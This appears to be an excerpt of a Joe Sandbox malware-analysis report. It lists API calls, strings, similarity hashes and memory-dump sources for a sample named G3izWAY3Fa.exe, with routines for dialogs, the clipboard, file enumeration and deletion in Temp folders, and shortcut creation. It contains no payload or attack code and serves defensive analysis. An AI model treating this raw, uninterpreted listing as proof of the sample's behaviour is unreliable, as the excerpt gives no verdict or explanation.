                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 973152223-0
                                                                                              • Opcode ID: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
                                                                                              • Instruction ID: eafd0aff1283cdec3023edec91852d87283cefa69c9b21bce59c6677f93a42a7
                                                                                              • Opcode Fuzzy Hash: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
                                                                                              • Instruction Fuzzy Hash: 14B01271644200BFDB214F00DF06F057B21A790701F108030B344380F082712420EB1E
                                                                                              APIs
                                                                                              • CloseHandle.KERNEL32(FFFFFFFF,004032BC,00000000), ref: 00403457
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle
                                                                                              • String ID:
                                                                                              • API String ID: 2962429428-0
                                                                                              • Opcode ID: cd01773061dc76ed6dc42017c9b80e515b0b69eef6637a25064d86b5b90a4b84
                                                                                              • Instruction ID: 2202cf36b8f848177cc2ffd66234e305818bf21466fa1b02f98de814e748bada
                                                                                              • Opcode Fuzzy Hash: cd01773061dc76ed6dc42017c9b80e515b0b69eef6637a25064d86b5b90a4b84
                                                                                              • Instruction Fuzzy Hash: E5C0123060470096D6206F799E4F5063A18574073AB904326F1B5B40F2C77C5901893F
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,00000403), ref: 00404F18
                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00404F27
                                                                                              • GetClientRect.USER32(?,?), ref: 00404F64
                                                                                              • GetSystemMetrics.USER32(00000015), ref: 00404F6C
                                                                                              • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404F8D
                                                                                              • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404F9E
                                                                                              • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404FB1
                                                                                              • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404FBF
                                                                                              • SendMessageA.USER32(?,00001024,00000000,?), ref: 00404FD2
                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00404FF4
                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405008
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405029
                                                                                              • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405039
                                                                                              • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405052
                                                                                              • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 0040505E
                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 00404F36
                                                                                                • Part of subcall function 00403DC4: SendMessageA.USER32(00000028,?,00000001,00403BF5), ref: 00403DD2
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040507B
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00004E4D,00000000), ref: 00405089
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405090
                                                                                              • ShowWindow.USER32(00000000), ref: 004050B4
                                                                                              • ShowWindow.USER32(?,00000008), ref: 004050B9
                                                                                              • ShowWindow.USER32(00000008), ref: 00405100
                                                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405132
                                                                                              • CreatePopupMenu.USER32 ref: 00405143
                                                                                              • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405158
                                                                                              • GetWindowRect.USER32(?,?), ref: 0040516B
                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040518F
                                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051CA
                                                                                              • OpenClipboard.USER32(00000000), ref: 004051DA
                                                                                              • EmptyClipboard.USER32 ref: 004051E0
                                                                                              • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004051E9
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004051F3
                                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405207
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0040521F
                                                                                              • SetClipboardData.USER32(00000001,00000000), ref: 0040522A
                                                                                              • CloseClipboard.USER32 ref: 00405230
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                              • String ID: {
                                                                                              • API String ID: 590372296-366298937
                                                                                              • Opcode ID: 001334b4ba3c222cf79d50ec4f04ffad4c31a43647bbcf3abe0fe5947dea7136
                                                                                              • Instruction ID: d8c2bf4a41f8d47596d7e212a196e63f96e24a60825c263716f9721a4c55cacb
                                                                                              • Opcode Fuzzy Hash: 001334b4ba3c222cf79d50ec4f04ffad4c31a43647bbcf3abe0fe5947dea7136
                                                                                              • Instruction Fuzzy Hash: 99A13A71900208BFDB219F60DD89EAE7F79FB04355F00817AFA04BA2A0C7799A51DF59
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 004046E1
                                                                                              • GetDlgItem.USER32(?,00000408), ref: 004046EE
                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 0040473A
                                                                                              • LoadBitmapA.USER32(0000006E), ref: 0040474D
                                                                                              • SetWindowLongA.USER32(?,000000FC,00404CCB), ref: 00404767
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040477B
                                                                                              • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 0040478F
                                                                                              • SendMessageA.USER32(?,00001109,00000002), ref: 004047A4
                                                                                              • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004047B0
                                                                                              • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004047C2
                                                                                              • DeleteObject.GDI32(?), ref: 004047C7
                                                                                              • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004047F2
                                                                                              • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004047FE
                                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404893
                                                                                              • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004048BE
                                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 004048D2
                                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 00404901
                                                                                              • SetWindowLongA.USER32(?,000000F0,00000000), ref: 0040490F
                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404920
                                                                                              • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404A23
                                                                                              • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404A88
                                                                                              • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404A9D
                                                                                              • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404AC1
                                                                                              • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404AE7
                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404AFC
                                                                                              • GlobalFree.KERNEL32(?), ref: 00404B0C
                                                                                              • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404B7C
                                                                                              • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404C25
                                                                                              • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404C34
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00404C54
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00404CA2
                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00404CAD
                                                                                              • ShowWindow.USER32(00000000), ref: 00404CB4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                              • String ID: $M$N
                                                                                              • API String ID: 1638840714-813528018
                                                                                              • Opcode ID: 2218f254bd768403f12b45b221eec84538c1d5bde26f6f708cdc4201c9d318c0
                                                                                              • Instruction ID: 1ebc4e1f5dd1db854d7f91ec63dfd1d34711f9484ded547680f267f962745bc2
                                                                                              • Opcode Fuzzy Hash: 2218f254bd768403f12b45b221eec84538c1d5bde26f6f708cdc4201c9d318c0
                                                                                              • Instruction Fuzzy Hash: 0802ADB0A00208EFDB20DF65DC45AAE7BB5FB84315F10817AF610BA2E1D7799A41CF58
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404219
                                                                                              • SetWindowTextA.USER32(?,?), ref: 00404246
                                                                                              • SHBrowseForFolderA.SHELL32(?,0041F848,?), ref: 004042FB
                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404306
                                                                                              • lstrcmpiA.KERNEL32(open C:\Windows\temp\Edit9,00420478), ref: 00404338
                                                                                              • lstrcatA.KERNEL32(?,open C:\Windows\temp\Edit9), ref: 00404344
                                                                                              • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404354
                                                                                                • Part of subcall function 00405282: GetDlgItemTextA.USER32(?,?,00000400,00404387), ref: 00405295
                                                                                                • Part of subcall function 00405C3F: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405C97
                                                                                                • Part of subcall function 00405C3F: CharNextA.USER32(?,?,?,00000000), ref: 00405CA4
                                                                                                • Part of subcall function 00405C3F: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CA9
                                                                                                • Part of subcall function 00405C3F: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CB9
                                                                                              • GetDiskFreeSpaceA.KERNEL32(0041F440,?,?,0000040F,?,0041F440,0041F440,?,00000000,0041F440,?,?,000003FB,?), ref: 0040440D
                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404428
                                                                                              • SetDlgItemTextA.USER32(00000000,00000400,0041F430), ref: 004044A1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                              • String ID: A$C:\Windows\temp$open C:\Windows\temp\Edit9
                                                                                              • API String ID: 2246997448-1475063729
                                                                                              • Opcode ID: 6e673fc6d151b24e91dad944200417fa3a5a6dedc4a92dfa1b187ab04de59240
                                                                                              • Instruction ID: b374e158efdd7287bf49babe660ec8015a33fdd664c905072b33ae798ddb7db4
                                                                                              • Opcode Fuzzy Hash: 6e673fc6d151b24e91dad944200417fa3a5a6dedc4a92dfa1b187ab04de59240
                                                                                              • Instruction Fuzzy Hash: 4C9175B1A00219ABDF11AFA1CC84AAF7AB8EF44354F10407BFA04B62D1D77C9A41DB59
                                                                                              APIs
                                                                                              • DeleteFileA.KERNEL32(?,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000), ref: 00405320
                                                                                              • lstrcatA.KERNEL32(00421480,\*.*,00421480,?,00000000,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000), ref: 0040536A
                                                                                              • lstrcatA.KERNEL32(?,00409010,?,00421480,?,00000000,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000), ref: 0040538B
                                                                                              • lstrlenA.KERNEL32(?,?,00409010,?,00421480,?,00000000,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000), ref: 00405391
                                                                                              • FindFirstFileA.KERNEL32(00421480,?,?,?,00409010,?,00421480,?,00000000,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000), ref: 004053A2
                                                                                              • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 00405454
                                                                                              • FindClose.KERNEL32(?), ref: 00405465
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405302
                                                                                              • \*.*, xrefs: 00405364
                                                                                              • "C:\Users\user\Desktop\G3izWAY3Fa.exe", xrefs: 0040530C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                              • String ID: "C:\Users\user\Desktop\G3izWAY3Fa.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                              • API String ID: 2035342205-2680054973
                                                                                              • Opcode ID: ab34e0f4a398502fe4f841fd0ab2e19b6a8460b2f5b0e4388ce4a397f92dccb8
                                                                                              • Instruction ID: 4b200e60d3e8d58e0ab6cbb93b3ca9934a2dcfa31e3b076817fab6d13423d761
                                                                                              • Opcode Fuzzy Hash: ab34e0f4a398502fe4f841fd0ab2e19b6a8460b2f5b0e4388ce4a397f92dccb8
                                                                                              • Instruction Fuzzy Hash: 45511230844A48B6DB226B228C45BFF3A78DF4275AF14813BF845751D1C77C4981DE6E
                                                                                              APIs
                                                                                              • GetVersion.KERNEL32(?,0041FC50,00000000,00404DB3,0041FC50,00000000), ref: 00405AA7
                                                                                              • GetSystemDirectoryA.KERNEL32(open C:\Windows\temp\Edit9,00000400), ref: 00405B22
                                                                                              • GetWindowsDirectoryA.KERNEL32(open C:\Windows\temp\Edit9,00000400), ref: 00405B35
                                                                                              • SHGetSpecialFolderLocation.SHELL32(?,0040F020), ref: 00405B71
                                                                                              • SHGetPathFromIDListA.SHELL32(0040F020,open C:\Windows\temp\Edit9), ref: 00405B7F
                                                                                              • CoTaskMemFree.OLE32(0040F020), ref: 00405B8A
                                                                                              • lstrcatA.KERNEL32(open C:\Windows\temp\Edit9,\Microsoft\Internet Explorer\Quick Launch), ref: 00405BAC
                                                                                              • lstrlenA.KERNEL32(open C:\Windows\temp\Edit9,?,0041FC50,00000000,00404DB3,0041FC50,00000000), ref: 00405BFE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$open C:\Windows\temp\Edit9
                                                                                              • API String ID: 900638850-3049956873
                                                                                              • Opcode ID: 4882c5000ece73840c27ef34f72b9de924b5e58c0caf7ba4a0b851a4f11f77ef
                                                                                              • Instruction ID: d3edd175ae4d098aa1e1d30cbcff8d3f456ad99068bf2b680a9da6a8a672f2a4
                                                                                              • Opcode Fuzzy Hash: 4882c5000ece73840c27ef34f72b9de924b5e58c0caf7ba4a0b851a4f11f77ef
                                                                                              • Instruction Fuzzy Hash: 30511471A04A04ABEB215F68DC84B7F3BB4EB55324F14423BE911B62D1D27C6981DF4E
                                                                                              APIs
                                                                                              • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402073
                                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409348,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040212D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharCreateInstanceMultiWide
                                                                                              • String ID: C:\Windows\temp
                                                                                              • API String ID: 123533781-823764690
                                                                                              • Opcode ID: 2dd538ee9b8a3d7f9f3516468ec66178ea648c363e8e90f8139c66e2dda502c8
                                                                                              • Instruction ID: ce0b4858a9f81ea3ddc308d80d774a06bef6b406c5dcff46aa6a4b0d76e862c7
                                                                                              • Opcode Fuzzy Hash: 2dd538ee9b8a3d7f9f3516468ec66178ea648c363e8e90f8139c66e2dda502c8
                                                                                              • Instruction Fuzzy Hash: AE418E75A00205BFCB40DFA4CD88E9E7BBABF48354B204269FA15FB2D1CA799D41CB54
                                                                                              APIs
                                                                                              • FindFirstFileA.KERNEL32(?,004224C8,00421880,004055F4,00421880,00421880,00000000,00421880,00421880,?,?,00000000,00405316,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000), ref: 00405CE3
                                                                                              • FindClose.KERNEL32(00000000), ref: 00405CEF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFileFirst
                                                                                              • String ID:
                                                                                              • API String ID: 2295610775-0
                                                                                              • Opcode ID: eaa6d706d35b9193dbeff2470bba944fadabcf5bc74d52a04f68ed274a91c94e
                                                                                              • Instruction ID: 9a18407f5d3c0b203e51d924b64f4f6f4a008a27543408caa796c3d3b713bef8
                                                                                              • Opcode Fuzzy Hash: eaa6d706d35b9193dbeff2470bba944fadabcf5bc74d52a04f68ed274a91c94e
                                                                                              • Instruction Fuzzy Hash: 91D0C93594D620ABD6012728AD0884B6A589B153317508B32F46AE22E0C7748C529AA9
                                                                                              APIs
                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040264D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
